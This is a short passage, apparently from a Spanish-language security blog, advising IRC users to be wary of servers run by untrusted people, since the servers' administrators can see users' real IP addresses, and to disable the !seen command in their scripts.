"amiguetes" y, mucho menos aún, si nos dice alguien que no sea de nuestra total confianza "oye he montado un servidor de irc, entra a verlo". no olvidemos que los administradores de los servidores de irc pueden ver nuestra ip real.<br /><br />-Desactivando el comando !seen en nuestro script.</nick></tunick></tunick></tunick></tunick></tunick></tunick></tunick></tunick></tunick></tunick></tunick></tunick>Cibercentinelahttp://www.blogger.com/profile/00237087687003170157noreply@blogger.com1